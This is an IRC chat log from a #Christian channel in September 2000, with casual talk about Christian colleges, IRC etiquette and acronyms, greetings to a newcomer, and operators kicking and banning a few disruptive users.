[00:10] <damrekcah> raid: i'm not saying that.. i'm just saying how its setup
[00:10] <gen|c0de> it was by stupid people
[00:10] <damrekcah> i'm tired of talking about this
[00:10] <gen|c0de> i know them
[00:10] <gen|c0de> they got caught
[00:10] <Raid> lol
[00:10] <damrekcah> i'm going to listen to some music
[00:10] <damrekcah> bye
[00:10] *** damrekcah (zxcv@ip52084.wstcmp.ukans.edu) has left #christian
[00:10] <HotPink> yo
[00:10] <gen|c0de> but what about the hundreds of attacks that followed their arrest
[00:10] <gen|c0de> no offense
[00:11] <gen|c0de> but how come christians get huffy puffy and leave when their wrong?
[00:11] <HotPink> not all christians do
[00:11] <HotPink> please don't generalize
[00:11] <rts> gen|c0de: even if they're right: it's the disagreement they don't like, I think
[00:11] <gen|c0de> yes, i shouldnt have generalized
[00:11] <HotPink> were humans just like anyone else with opinions
[00:12] <gen|c0de> rts: I just moved away from tulsa ok, they love to argue when their right
[00:12] <gen|c0de> sorry again generalizitation
[00:12] <gen|c0de> i used to work next door to oral roberts university
[00:12] <HotPink> it's cool
[00:12] <HotPink> just making a point
[00:12] <HotPink> :)
[00:12] <rts> gen|c0de: heh. Looneyville by the sounds of it
[00:12] <gen|c0de> well accross the street
[00:12] <gen|c0de> rts: they've got two of the largest christian colleges there are
[00:13] <rts> gen|c0de: they = Tulsa or they = Oral Roberts?
[00:13] <gen|c0de> ah yes rheama ( sp? )
[00:13] <gen|c0de> tula
[00:13] <gen|c0de> oru is one of the colleges
[00:13] *** creeper has left IRC
[00:13] <gen|c0de> rheama bought just about everything in this town
[00:13] *** Kozubchik (orthodox@166.82.142.211) has joined #christian
[00:13] *** ^dan- is now known as dan-
[00:13] <gen|c0de> and strictly restricts it to rheama students
[00:13] <rts> forgive me, but "Christian College" sounds like "military intelligence" to me :)
[00:13] <Colin^> Hi ya Kozubchik
[00:13] -> *dan-* back now?
[00:13] <gen|c0de> lol rts
[00:13] <HotPink> well
[00:13] <gen|c0de> it is
[00:14] <HotPink> i fully intend on
[00:14] <HotPink> going to
[00:14] <HotPink> a christian college
[00:14] *** laura7 (mortalem@12.128.176.175) has joined #christian
[00:14] <Vote4Bush> which one
[00:14] <Dovi-dude> rts, nah,, thats how georgetown, yale, etc started as, remeber? :)
[00:14] <HotPink> trinity christian college
[00:14] * Vote4Bush is going to a Christian college next fall
[00:14] *** Disconnected
[00:14] * Raid is away since 00:14:31 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be
saved.
[00:14] *** Attempting to rejoin...
[00:14] * Raid has returned ( Auto-Away: Not here ) - on 00:14:34 @ 09/09/2000 - Away 0
minutes.
#Christian Cannot send to channel
[00:14] *** Rejoined channel #christian
[00:14] *** Topic is 'Encourage each other daily. (Hebrews 3:13)'
[00:14] *** Set by Beukeboom on Fri Sep 08 03:42:55
[00:14] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[00:14] <Vote4Bush> i will probably go to johnson bible college in knoxville TN
[00:14] <Colin^> wb Raid
[00:14] <Raid> sigh
[00:14] <Raid> Vote4Bush: It's an interesting place.
[00:14] <HotPink> don't go to milligan
[00:15] <gen|c0de> HotPink: youd be better off going to a regular college, most of the
people ive encounterd at those colleges are far from what youd call a christian
[00:15] *** Colin^ sets mode: -b *!Hell@*.sympatico.ca
[00:15] <Vote4Bush> lol im not going to milligan
[00:15] <gen|c0de> they get their all hot for jesus
[00:15] *** ironic^^ (666@203.170.14.152) Quit (Ping timeout for ironic^^[203.170.14.152])
[00:15] <HotPink> gen-well good for them
[00:15] <Vote4Bush> friend going there though
[00:15] <HotPink> they should get a cookie
[00:15] <HotPink> but i'm not them
[00:15] <Vote4Bush> raid you know johnson? or just knoxville?
[00:15] <gen|c0de> within a year they fall off the train per se
[00:15] <HotPink> milligan is so full of crap
[00:15] <Raid> Vote4Bush: both. hehe
[00:15] <HotPink> like half of the kids there smoke and drink
[00:15] <Raid> Vote4Bush: I went to johnson for a service contract; I'm one of the techs
that fixes their stuff.
[00:15] <Colin^> HotPink watch the language please
[00:15] * HotPink watches
[00:15] <HotPink> yep
[00:16] <HotPink> there it is
[00:16] <gen|c0de> crap?
[00:16] <HotPink> heh
[00:16] <Vote4Bush> oh, alright. you probably met my uncle, he is dealing with most of that
[00:16] <gen|c0de> whats wrong with that?
[00:16] *** ironic^^ (666@203.170.14.152) has joined #Christian
[00:16] <HotPink> yeah
[00:16] *** satiaKat (cherish@ppp162.jn.centurytel.net) has joined #Christian
[00:16] <HotPink> i'm baffled too
[00:16] <HotPink> anyway
[00:16] <Vote4Bush> how is it full.... hotpink?
[00:16] <gen|c0de> how come you didnt say anything to me for using the lords name in vein??
[00:16] <HotPink> because they claim be strict
[00:16] <HotPink> and all for god and not allowing that stuff
[00:16] <HotPink> heh
[00:16] <gen|c0de> thats more of a 'crime' then saying crap
[00:17] <HotPink> and they just act like it doesn't happen
[00:17] *** Colin^ sets mode: +b *!*generic@*.quik.com
[00:17] *** gen|c0de was kicked by Colin^ (This random kick message was censored by popular
request)
[00:17] <Vote4Bush> um
[00:17] <HotPink> your such a hypocrite
[00:17] <Vote4Bush> did he just like... ask to be kicked?
[00:17] <HotPink> that was so stuppid
[00:17] *** Kozubchik (orthodox@166.82.142.211) Quit (†[C-Script]† - www.C-Script.com and
irc.C-Script.com)
[00:17] *** Colin^ sets mode: +b *!piglet@*.mvn.net
[00:17] *** HotPink was kicked by Colin^ (I'm only doing this because I care)
[00:17] <thumps> ;)
[00:17] *** laura7 (mortalem@12.128.176.175) Quit (Leaving)
[00:17] <Vote4Bush> arg
[00:17] *** satiaKat (cherish@ppp162.jn.centurytel.net) Quit (GOD IS
AWSOME!!!..............ALL THE TIME!!!!)
[00:18] <Vote4Bush> whassup thumps
[00:18] <thumps> Vote4Bush: not much
[00:19] <YinsMom> see ya later thumps....bye room
[00:19] *** YinsMom (YinsMom@IP227210.DIALUP.WVNET.EDU) has left #Christian
[00:19] * PaganJoy hugs thumps till her has a Victorian cinched waistline
[00:19] <PaganJoy> her = he
[00:20] <thumps> hahah pags
[00:20] <Maverick> Scary.
[00:20] *** newzeal (kcf@210-55-144-52.dialup.xtra.co.nz) has left #Christian
[00:20] <Dovi-dude> night room, peace
[00:20] *** Dovi-dude (~Dovi-dude@a1p22-ct.megahits.net) has left #Christian
[00:21] * thumps hugs pags till she ............sez yes
[00:21] <PaganJoy> ooh la la
[00:21] <Lanfear`> to what?
[00:21] <thumps> ;)
[00:21] <Vote4Bush> heh
[00:22] *** Re[D]eemd (davo@cx328970-c.okcs1.ok.home.com) Quit (Mental floss with God's Word
daily to prevent truth decay!)
[00:22] * Colin^ could do with a nice cup of tea
[00:23] <Raid> Hmmm
[00:23] <Raid> Thats actually a cute quit msg
[00:23] * Vote4Bush boils some water for tea
[00:24] <rts> except the idea of flossing one's brain doesn't sound so appealing
[00:24] <rts> you'd probably.. damage something, I'm sure
[00:24] <Vote4Bush> lol
[00:25] <rts> "Ow, my frontal lobe... *drool*"
[00:25] * Pipetobak reaches into the breast pocket of his flannel shirt and extracts a well
worn, and well appreciated briar pipe. Meticulously he fills the pipe with delightful
crumbles of leaf and gripping the stem of the pipe with his teeth, he strikes a match. The
creamy, dense, vanilla tinted smoke is rich and delightful and he inhales it deeply with
relish as he glances about looking for interesting conversation.
[00:26] <Raid> hmmm
[00:26] <Colin^> thumps can send you a home lobotomy kit to try rts
[00:26] <Raid> I have migraines alot as it is, I think that would make it worse.
[00:26] <Maverick> Pipetobak: I'm sure those auto-scripts of yours get longer every time I
see then.
[00:26] <Raid> shrug.
[00:27] * thumps reaches for his sharp fork
[00:27] <Raid> Maverick: He does it to annoy you. ;p Everytime you complain, it grows by 2
lines. <G>
[00:27] <Maverick> LOL
[00:27] <Maverick> Really Raid?
[00:27] <Raid> no hehe
[00:27] <rts> Colin^: cool
[00:27] <Raid> but it sounded good didn't it? ;)
[00:27] *** fitzfield (~wella@202.78.95.104) has joined #Christian
[00:27] <rts> 'cause you know, I just have way too much brain
[00:27] <Colin^> Pipetobak changes them often
[00:28] *** ramdac (ramdac@1Cust138.tnt1.ruston.la.da.uu.net) has joined #Christian
[00:28] <Colin^> yesterday was one liner and I almost fainted
[00:28] <Lanfear`> one liner?
[00:28] *** Adar_Caan (adarcaan@c184662-a.dals1.tx.home.com) Quit
(NewYork-R.NY.US.Undernet.Org SantaClara.CA.US.Undernet.Org)
[00:28] *** Jubei (jirc@ascl-a2-9.usask.ca) Quit (NewYork-R.NY.US.Undernet.Org
SantaClara.CA.US.Undernet.Org)
[00:29] <Lanfear`> oh..
[00:29] <Lanfear`> never mind
[00:29] * Vote4Bush blows everyone a kiss goodnight
[00:29] *** Vote4Bush (besordew@iq-ind-as005-92.iquest.net) Quit (Friends don't let friends
vote democrat.)
[00:29] *** Adar_Caan (adarcaan@c184662-a.dals1.tx.home.com) has joined #Christian
[00:29] <Pipetobak> Yes I do, Colin. To keep it interesting for all.
[00:29] <Maverick> I can believe that.
[00:29] <Maverick> The day he floods the channel for it Colin^, you should kick him;-)
[00:29] *** Jubei (jirc@ascl-a2-9.usask.ca) has joined #Christian
[00:29] *** Jubei (jirc@ascl-a2-9.usask.ca) Quit (Leaving)
[00:30] *** Jubei1 (jirc@ascl-a2-9.usask.ca) has joined #Christian
[00:30] <thumps> and break the silence or idle chat?
[00:30] <rts> shh
[00:30] <Jubei1> I say we idle chat
[00:31] *** just_gal (~dacer@202.134.245.187) Quit (#kingcoles #samarnon #kingcoles
#samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles #samarnon #kingcoles
#samarnon #kingcoles #samarnon #kingcoles #s)
[00:31] <Pipetobak> Why should I be kicked? I never flood the channel.
[00:32] <Pipetobak> I merely send an image of me so you may better visualize me as you speak
to me.
[00:32] <Colin^> :o)
[00:33] * Maverick checks out more Matrix sites.
[00:33] *** Colin^ sets mode: -b *!*@supernal.godsey.net
[00:33] *** maiang (~cinde_cut@208.160.243.137) has joined #Christian
[00:33] *** fitzfield (~wella@202.78.95.104) Quit (Ping timeout for fitzfield[202.78.95.104])
[00:33] <Maverick> Boy.
[00:33] <Maverick> Its gone kinda quiet.
[00:33] <Maverick> Am I lagged?
[00:33] <Maverick> Or has everyone decided I am not worth listening to?
[00:33] * Maverick decides about this.
[00:33] *** LadyViv (Net1@async39-cab-isp-1.nas.one.net.au) has joined #Christian
[00:33] *** logos3 sets mode: +b *!*@*.one.net.au
[00:33] <Colin^> is chatting in message
[00:33] *** LadyViv was kicked by logos3 (banned: ISP banned: Continued illegal activity by
one user)
[00:33] *** Colin^ sets mode: -o Colin^
[00:34] <Maverick> I canna find my glasses.
[00:35] <Colin^> Mine are on my nose
[00:35] *** ironic^^ (666@203.170.14.152) Quit (SoMEdAy, SomHoW, FaR bEyOuNd 2 DaY i WiLl
FiNd ThE wAy 2 FiNd U bUt SoMeHoW tHrU tHe LoNlYnIghT i Will LiVe ThE In ThE dArK tHaT U r
n2 My HeArt LoVe U .(.KATE))
[00:35] * rts is away: not here
[00:35] *** rts (~samm@cr1016134-a.crdva1.bc.wave.home.com) has left #Christian
[00:35] *** Pipetobak (Beard@as4-dial22.flnt.mi.voyager.net) Quit (Leaving)
[00:36] <Maverick> Oh my goodness I was lagged.
[00:36] *** Pipetobak (Beard@as4-dial22.flnt.mi.voyager.net) has joined #Christian
[00:36] <thumps> wb pipe :)
[00:37] <Maverick> Oh my goodness I was lagged.
[00:37] *** sansan` (ff@ip13.vancouver6.dialup.canada.psi.net) has joined #Christian
[00:37] <Maverick> Why didn't anyone tell me?
[00:37] <Maverick> huh?
[00:37] <Maverick> :P
[00:38] <Maverick> =)
[00:38] *** FuNNy (~aiue@202.77.100.241) has joined #Christian
[00:38] *** fitzfield (~wella@202.78.95.104) has joined #Christian
[00:39] *** eagles` (rashton@1Cust223.tnt4.adl1.da.uu.net) has joined #Christian
[00:39] <FuNNy> hi..
[00:39] <Colin^> hey eagles
[00:39] <eagles`> hey Colin^... just sent you an icq lol
[00:40] *** Dawn (prospect@bc-vic-a53-01-71.look.ca) has joined #Christian
[00:40] <FuNNy> colin??
[00:40] *** fitzfield (~wella@202.78.95.104) Quit (Broken pipe)
[00:40] <Dawn> hi, i'm new to this site
[00:41] <eagles`> hello Dawn... nice to meet you
[00:41] *** [Mo]- (DaBeans@btstts04c24.nbnet.nb.ca) has joined #Christian
[00:41] <Dawn> nice to meet you to eagles
[00:42] <FuNNy> hi dawn
[00:42] <Dawn> hi FuNNy
[00:42] <eagles`> you a Canadian, me an Ozzie Welsman, lol, who speaks a little French :)
[00:42] <FuNNy> hi
[00:42] <Dawn> I am actually new to the whole IRC experience
[00:43] <Raid> Dawn: Welcome.
[00:43] <FuNNy> how r u dawn?
[00:43] <eagles`> you are still welcome, happens to all of us at some stage :)
[00:43] <Lanfear`> well.. I have to get up REALLY early
[00:43] <Lanfear`> sigh sigh
[00:43] <[Mo]-> i speak french
[00:43] <Dawn> i am fine and how are you
[00:43] <Lanfear`> on a saturday no less.. chat ya'll later
[00:43] * Colin^ speaks french
[00:43] *** Lanfear` (trek@B104-13.BNSL.splitrock.net) Quit (Leaving)
[00:43] <Raid> sigh, bye lan.
[00:43] <eagles`> enchante, [Mo]-
[00:43] <[Mo]-> hehe
[00:43] <[Mo]-> who can really speak french here?
[00:44] <eagles`> un petit peu, mais ne pas dans ce channel
[00:44] <Dawn> I only understand French when I hearit
[00:44] *** thumps (awBabydawl@c949298-a.decatur1.il.home.com) has left #Christian
[00:44] <FuNNy> great
[00:44] <eagles`> on parles Anglais ici :)
[00:44] *** charisma (~Jazzman@dx-52.pempe.net) Quit (Why do people cry when they hear the
word goodbye!!!!)
[00:44] <Maverick> hey eagles`
[00:44] <Colin^> Je parle francais mon ami
[00:44] <maiang> hi egales
[00:44] <maiang> hi eagles
[00:44] <Jubei1> I'm a redneck commie saskatchewan hick :)
[00:44] <eagles`> yo Maverick :)
[00:44] <Jubei1> I don't speak french... but I can say "I loose" in ancient Greek :)
[00:44] <eagles`> kewl <g>
[00:44] <Jubei1> I just started learning the language last week :)
[00:44] <eagles`> hehe
[00:45] <[Mo]-> a oui, hé bien c'est vraiment amusant a savoir Colin^
[00:45] <eagles`> this is why I come on to IRC, to chat and have a fun time
[00:45] <Jubei1> Colin, I understood. Mo, you lost me :)
[00:45] *** `Ash` (joyfull@zoom12-031.telepath.com) has joined #Christian
[00:45] <Colin^> brb
[00:45] <[Mo]-> :P
[00:45] *** Colin^ (hello@p99-tnt1.ham.ihug.co.nz) has left #Christian
[00:45] <Raid> Dawn: Just so you know, IRC is very addicting. :)
[00:45] *** Colin^ (hello@p99-tnt1.ham.ihug.co.nz) has joined #Christian
[00:45] <maiang> bye
[00:45] * eagles` remembers starting to learn german in school and the first words were
vulgar when said in English
[00:45] <Dawn> that i have heard and i can see why
[00:45] <eagles`> I eat.... and father
[00:46] *** X sets mode: +o Colin^
[00:46] <eagles`> oh dear dont kick me!!!!!!!!!!!
[00:46] *** Colin^ sets mode: -b *!*gggr@202.77.100.*
[00:46] *** Colin^ sets mode: +b *!*@202.77.100.*
[00:46] *** FuNNy was kicked by Colin^ (P.S. This doesn't mean we can't be friends)
[00:46] <Dawn> can someone tell me what brb and :p means
[00:46] <`Ash`> be right back
[00:46] <Colin^> be right back
[00:46] <Dawn> i know what lol means
[00:46] <[Mo]-> k
[00:46] <Colin^> :p is someone poking their tounge out
[00:47] *** maiang (~cinde_cut@208.160.243.137) Quit (Yesterday is History...Tomorrow is
Mystery..Today is a Gift..thats why its called " present "...Live it !!!)
[00:47] <eagles`> brb is an acronym... be right back
[00:47] <Dawn> thank you
[00:47] <eagles`> asl often asked by filipinos, is age sex location
[00:47] <eagles`> ctc is care to chat
[00:47] <Dawn> oh lovely
[00:47] <Jubei1> :) is something that is overused
[00:47] <eagles`> rofl is rolling on the floor laughing
[00:48] <eagles`> quite something to do in real life :))
[00:48] <eagles`> oh and rl is real life
[00:48] <[Mo]-> lol
[00:48] <Colin^> :oÞ
[00:49] <eagles`> Dawn you are using mIRC like I am... they have a very good series of helps
on their website and in their help files
[00:49] <[Mo]-> and std is something to do
[00:49] <eagles`> heh didnt know that!
[00:49] <[Mo]-> lol
[00:49] <Dawn> i should check out the help files, and i thank you for all your help
[00:50] <eagles`> meant to add that much of the acronyms are in those help files
[00:50] *** Colin^ sets mode: -bbb *!piglet@*.mvn.net *!*generic@*.quik.com *!*DIE@*.rcn.com
[00:50] *** Colin^ sets mode: -o Colin^
[00:50] <Dawn> great to know
[00:50] <Raid> Dawn: and you can learn just by being in chat... it's fun.
[00:50] *** `Ash` (joyfull@zoom12-031.telepath.com) has left #Christian
[00:50] <eagles`> sure is
[00:51] <Dawn> i watched a bit here and there to get the jist of it.
[00:51] *** Icon (Icon@idxwc07-08.idx.com.au) has joined #Christian
[00:51] <eagles`> sometimes its boring, sometimes infuriating, but mostly it's great... and
as Raid said, can become addictive very easily
[00:51] <Maverick> Oh no.
[00:51] *** gen|c0de (~genera@ipa023.boston.quik.com) has joined #Christian
[00:52] <Colin^> wb gen|c0de
[00:52] <gen|c0de> crap.
[00:52] <Dawn> i know i need to be careful, often i am not doing to much so this could
become a habit that may not be to good
[00:52] <gen|c0de> i was sitting there playing with identd
[00:52] <gen|c0de> and i went hrm
[00:52] <gen|c0de> dude its only a nick ban
[00:52] <gen|c0de> regardless
[00:52] *** Icon (Icon@idxwc07-08.idx.com.au) has left #Christian
[00:52] <Colin^> gen|c0de I removed the ban
[00:52] <eagles`> Dawn you need to be careful to whom you give personal details because
cyber stalking is a very realproblem
[00:53] <gen|c0de> no you didnt
[00:53] <Colin^> Yes I did kid
[00:53] <gen|c0de> unless you di it just like 5 seconds ago
[00:53] <gen|c0de> hi raid
[00:53] <Colin^> I did
[00:53] <gen|c0de> :)
[00:53] *** Icon (~cookie@idxwc07-08.idx.com.au) has joined #Christian
[00:53] <Raid> gen|c0de: heh, hello ;p
[00:53] <Dawn> i understand that, I knew someone who got into trouble
[00:53] *** generic (~generic@ipa023.boston.quik.com) has joined #Christian
[00:53] <Colin^> ** Colin^ sets mode: -bbb *!piglet@*.mvn.net *!*generic@*.quik.com
*!*DIE@*.rcn.com
[00:53] <Colin^> (eagles`): meant to add that much of the acronyms are in those help files
[00:53] *** Icon (~cookie@idxwc07-08.idx.com.au) Quit (Read error to
Icon[idxwc07-08.idx.com.au]: EOF from client)
[00:53] <eagles`> gen|c0de I wonder why you are arguing?you are in here... therefore no
ban... as I see it
[00:53] <Colin^> gen|c0de see it?
[00:53] <gen|c0de> ah well you just did it a few minutes ago
[00:54] <generic> this is me too
[00:54] <eagles`> so what buddy? grrrrrrrr
[00:54] <Colin^> Make one of them go generic
[00:54] <Dawn> how does one get banned?
[00:54] <gen|c0de> regardless, learn how to do bans correctly
[00:54] <gen|c0de> better yet
[00:54] <eagles`> very easily lol
[00:54] *** X sets mode: +o Colin^
[00:54] <eagles`> here it comes
[00:54] *** gen|c0de (~genera@ipa023.boston.quik.com) has left #Christian
[00:54] <eagles`> lol
[00:54] <Dawn> lol
[00:54] <Colin^> Thanks
[00:54] *** generic (~generic@ipa023.boston.quik.com) has left #Christian
[00:55] *** generic (~generic@ipa023.boston.quik.com) has joined #Christian
[00:55] <eagles`> hmmm my script didnt pick up the clone
[00:55] *** FlyGuy_38 (NorthGuy51@ptcm02m03-196.bctel.ca) has joined #Christian
[00:55] *** BassPlaye (~dontyouda@cras58p137.navix.net) has joined #Christian
[00:55] <Colin^> Hey BassPlaye
[00:55] <generic> hey i just realized my part message didnt come through
[00:55] <BassPlaye> hi
[00:55] <eagles`> hey the canuks are coming in fast
[00:55] <Colin^> Hello FlyGuy_38
[00:55] <eagles`> hi BassPlaye
[00:55] <generic> you can go fuck yourtself cause i didnt want to be here anyways
[00:55] *** generic (~generic@ipa023.boston.quik.com) has left #Christian
[00:55] <FlyGuy_38> hi
[00:56] *** X sets mode: +o eagles`
[00:56] <eagles`> i have word kick enabled
[00:56] <Dawn> now now watch your language:)
[00:56] *** rts (~samm@cr1016134-a.crdva1.bc.wave.home.com) has joined #Christian
[00:56] <Colin^> Hi rts
[00:56] <rts> yo
[00:56] <eagles`> hey rts
[00:56] *** Colin^ sets mode: -o Colin^
[00:57] <rts> greetings
[00:57] <eagles`> duh didnt mean to push you off the pole Colin^
[00:57] <Colin^> eagles` tis ok, I wanted to read a newsgroup
[00:57] *** weird (mirr@edtntnt3-port-57.dial.telus.net) has joined #Christian
[00:58] <weird> oh oh i am there
[00:58] *** JAA98 (~ielli@208.160.238.17) has joined #Christian
[00:58] <eagles`> Dawn you were asking about banning... we are pretty tolerant here excepyt
with those who come in deliberately to make trouble
[00:58] <weird> apologies peoples
[00:59] <Dawn> i see, this is good:)
[00:59] <PaganJoy> hi Dawn
[00:59] <Dawn> Hi
[01:00] <weird> i am not weird
[01:00] <Dawn> i'm sure you're not
[01:00] <Jubei1> Your name is misleading then :)
[01:00] <Raid> Dawn: Just play it cool and bans aren't something you'll have to worry about.
[01:00] <Jubei1> Myself, I'm completely mad
[01:00] <weird> its a mistaken story too long to tell
[01:00] <eagles`> we have a three-strikes-and-you-are-out policy generally speaking, a
"kick" to remove ppl, and finally on the third offence a ban which runs for 24 hours typically
[01:01] *** Philip15 (CrAzzy@202.151.212.31) has joined #Christian
[01:01] <Jubei1> I play in large vats of jelly
[01:01] <Jubei1> I scream at the top of my lungs
[01:01] <weird> how do you mark?
[01:01] <Jubei1> I live to laugh and be jolly
[01:01] *** Philip15 (CrAzzy@202.151.212.31) Quit (don't love me from what u intend or hope
that I would be, and if ur only using me to feed ur fantasy, you're not really in love, so
let me go, I must be free!!!)
[01:01] <eagles`> Jubei1 sounds a sticky sort of situation to me :)
[01:01] <Jubei1> and I stuff my face with fresh baked buns
[01:01] <Jubei1> (I mean that in a totally non-sexual way)
[01:02] *** Disconnected
[01:02] * Raid is away since 01:02:26 - 09/09/2000 ( Auto-Away: Not here ) - Msgs will be
saved.
[01:02] *** Attempting to rejoin...
#CHristian Cannot send to channel
[01:02] * Raid has returned ( Auto-Away: Not here ) - on 01:02:29 @ 09/09/2000 - Away 0
minutes.
[01:02] *** Rejoined channel #christian
[01:02] *** Topic is 'Encourage each other daily. (Hebrews 3:13)'
[01:02] *** Set by Beukeboom on Fri Sep 08 03:42:57
[01:02] -logos3- http://www.forchrist.net - channel website, for rules and other info.
[01:02] <Jubei1> Once I was a philosophy major :)
[01:02] <PaganJoy> wb Raid!
[01:02] <Raid> My isp has got to get that fixed.
[01:02] <Jubei1> Once when my sanity was still intact
[01:02] <weird> well no i don't know....
[01:03] <Jubei1> But then... oh poor fortune that is me... it cracked... it cracked...
[01:03] <eagles`> hey the pagster didnt see you !!!!!!!!!!!!!!!!!!!!!!!!!!
[01:03] * Jubei1 brays laughing uncontrollably
[01:03] <PaganJoy> eagles!! hiya!!!!!!!! :)
[01:03] <eagles`> like a cuppa tea?
[01:03] <PaganJoy> Jubei-- go "The Nanny"'s laugh down pat? ;)
[01:03] <weird> yeah i would ta:)
[01:03] <PaganJoy> mmm tea!!
[01:04] <eagles`> Dawn there's also sounds linked to irc... does your computer have a sound
card?
[01:04] <Jubei1> Pagan> If it was... then I would be deranged, not merely mad
[01:04] <weird> green preferable
[01:04] *** sWeAtPeA (Havoc36@ACA0D0DB.ipt.aol.com) has joined #CHristian
[01:04] <Jubei1> But I am mad you see, and I'm also nutty
[01:04] <eagles`> if someone plays a sound your mirc can find, yours then plays the same one
[01:04] * PaganJoy nods solemnly
[01:04] <Jubei1> Which explains why women seem to like me with ice cream and other sweet
things
[01:04] * eagles` likes nutty.old navy expression for chocolate
[01:04] <weird> yeah yeah i dont do wavs:)
[01:04] <Dawn> i do not believe so. I am also new to the full extent of the computer world
[01:05] <eagles`> thats fine:)
[01:05] <eagles`> you know the diff between :) and :( ??
[01:05] <Jubei1> Whenever they see me they start shaking the cans, or scooping the tubs
[01:05] <Dawn> yes
[01:05] <Jubei1> They cover me, and then eat me all up
[01:05] <Jubei1> Cause I'm nutty
[01:05] * Jubei1 strolls around with a monacle and tophat
[01:06] <Jubei1> See... completely nutty... *twirls his cane*
[01:06] *** ^jer-bear (me@madras16-53.bendnet.com) has joined #CHristian
[01:06] <Dawn> i don't like being :( only :)
[01:06] <weird> who are you asking this eagle?:):(
[01:06] <eagles`> talking to Dawn who is new to IRC
[01:06] <weird> oh
[01:06] <weird> ok
[01:07] <Jubei1> But I think I'm going to retire from being insane
[01:07] <Jubei1> It is too much effort, too little pay
[01:07] <eagles`> also Dawn in mirc you can use the TAB key to save typing a person's
nickname... time saver... did you know that? It's called"nick complete"
[01:07] <Jubei1> I'll miss those pretty blue things they give you to swallow at that nice
place with men in white suits
[01:07] <Jubei1> But I think I am ready to move on
[01:07] <weird> huh
[01:07] * eagles` holds the door open
[01:08] <Jubei1> (Valium pills at the nuthouse) ;)
[01:08] <weird> nice
[01:08] *** CodePoet (kenneth@yak-p2-14.wolfenet.com) has joined #CHristian
[01:08] <weird> like nice
[01:08] *** Ixithmm (~hello@HSE-Montreal-ppp103152.sympatico.ca) Quit (Leaving)
[01:08] <Jubei1> I wish I had MIRC, but instead I have a java applet
[01:08] <Jubei1> Oops, accidently hit bold
[01:08] <Dawn> I have heard of that, I'm just winging this ya know:)
[01:08] <CodePoet> mIRC sucks
[01:08] <CodePoet> :P
[01:08] <weird> not a lot:)
[01:09] <Jubei1> Well, to bed with I
[01:09] <Jubei1> Goodnight all
[01:09] *** Jubei1 (jirc@ascl-a2-9.usask.ca) Quit (Leaving)
[01:09] <eagles`> bye Jubeil
[01:09] *** TacoMan (taco_man17@pm3a-176.dillon.mcn.net) has joined #CHristian
[01:10] <Maverick> Oh dear.
[01:10] <eagles`> oh?
[01:10] * eagles` wonders why isnt in her channel 2
[01:10] <weird> now you guys i have a question?
[01:10] * eagles` changes nick to dumbo - all ears
[01:11] <weird> IF
[01:11] <weird> if i want to join philosophy
[01:11] *** FlyGuy_38 (NorthGuy51@ptcm02m03-196.bctel.ca) has left #CHristian
[01:11] <weird> and IF
[01:12] <weird> if they think i am weird
[01:12] *** Pipetobak (Beard@as4-dial22.flnt.mi.voyager.net) Quit (Ping timeout for
Pipetobak[as4-dial22.flnt.mi.voyager.net])
[01:13] <weird> how come its ok for me to be in christian?
[01:13] <Colin^> weird yes
[01:13] <eagles`> missed the drift of the question, sorry
[01:13] *** charisma (~Jazzman@dx-52.pempe.net) has joined #CHristian
[01:13] <weird> the drift was obscure... true
[01:13] *** Kenshin^^ (Kenshin@202.57.102.154) has joined #CHristian
[01:13] <Colin^> weird no one can se you in #christian from another channel anyway, its set
on secret
[01:14] <eagles`> see up the top it says channel modes are +stn
[01:14] <weird> not the point Colin^
[01:14] *** ^_John_^ (dirc@ppp162.jn.centurytel.net) has joined #CHristian
[01:14] <eagles`> secret, topics set by ops, no notices in
[01:14] *** cierra (Beloved@ppp-3-46.compuwise.net) has joined #CHristian
[01:14] <weird> oh ok what does that that mean?
[01:14] *** charisma (~Jazzman@dx-52.pempe.net) has left #CHristian
[01:14] <eagles`> secret means you dont show up on someone's /whois or on /names
[01:15] <weird> oh
[01:15] <Dawn> now i don't understand this secret stuff
[01:15] *** [Mo]- (DaBeans@btstts04c24.nbnet.nb.ca) has left #CHristian (CaLiNe DE BoNnEs
BiNnEs)
[01:15] <eagles`> unless they are in the same secret channel
[01:15] <cierra> hi pags
[01:15] <Colin^> weird so is the point " we think you are weird to be here ??
[01:15] <cierra> :)
[01:15] <eagles`> it is a protection, Dawn
[01:15] *** ^_John_^ is now known as ^John^
[01:15] <PaganJoy> hi cierra :)
[01:15] <cierra> :)
[01:15] <Colin^> HI ^John^
[01:15] <Colin^> hello cierra
[01:15] <cierra> hi colin
[01:15] <weird> well i am but do you think so
[01:15] <^John^> Hi ppl
[01:15] <eagles`> yes, weird
[01:15] <logos3> yes, wierd
[01:15] <weird> oh oh i am assuming my nick
[01:16] <Colin^> weird yes
[01:16] <eagles`> snap
[01:16] <weird> good one....
[01:16] *** ^jer-bear (me@madras16-53.bendnet.com) Quit (Leaving)
[01:16] <weird> i luv it!
[01:16] *** jamie^16 (~Jazzman@dx-52.pempe.net) has joined #CHristian
[01:16] <eagles`> brb, afk a moment ( Dawn that means away from keyboard)
[01:16] *** Kenshin^^ (Kenshin@202.57.102.154) Quit ((VirusScript 2øøø) GeT iT aT
http://www.v2000.cjb.net/ and http://www.yasarozg.net/)
[01:18] <weird> Scotish water is soft
[01:18] <weird> t
[01:18] <Colin^> weird its the Peat
[01:18] <weird> aaaah
[01:18] <weird> like carbonated?
[01:19] <Colin^> THats why they make such good Scotch
[01:19] <weird> the glens
[01:19] <Colin^> The water is filtered by the Peat
[01:19] <weird> aaaaah
[01:19] <weird> well it is true
[01:19] <weird> hair needs no conditioning
[01:20] <PaganJoy> niters all
[01:20] * PaganJoy waves :)
[01:20] *** PaganJoy (frostfire@user-38ld3dm.dialup.mindspring.com) Quit (Umm.. where am I
going, and what's with this handbasket??)
[01:21] *** BassPlaye (~dontyouda@cras58p137.navix.net) Quit (Ping timeout for
BassPlaye[cras58p137.navix.net])
[01:22] *** twile (freezer@207.0.112.77) has joined #CHristian
[01:22] <weird> so subteranean water is not a secret
[01:22] <weird> i just went there for the first time last month
[01:22] *** bu2zard (~wanabe@203.106.34.67) has joined #CHristian
[01:22] <Colin^> weird to the Highlands?
[01:22] <eagles`> Dawn there's another one, bbiab be back in a bit
[01:22] <weird> yes
[01:22] *** Maverick (teri@203-79-93-232.tnt11.paradise.net.nz) Quit (Ping timeout for
Maverick[203-79-93-232.tnt11.paradise.net.nz])
[01:23] <Dawn> thanks
[01:23] <weird> tho they liked me:)
[01:23] *** bu2zard (~wanabe@203.106.34.67) Quit (Leaving)
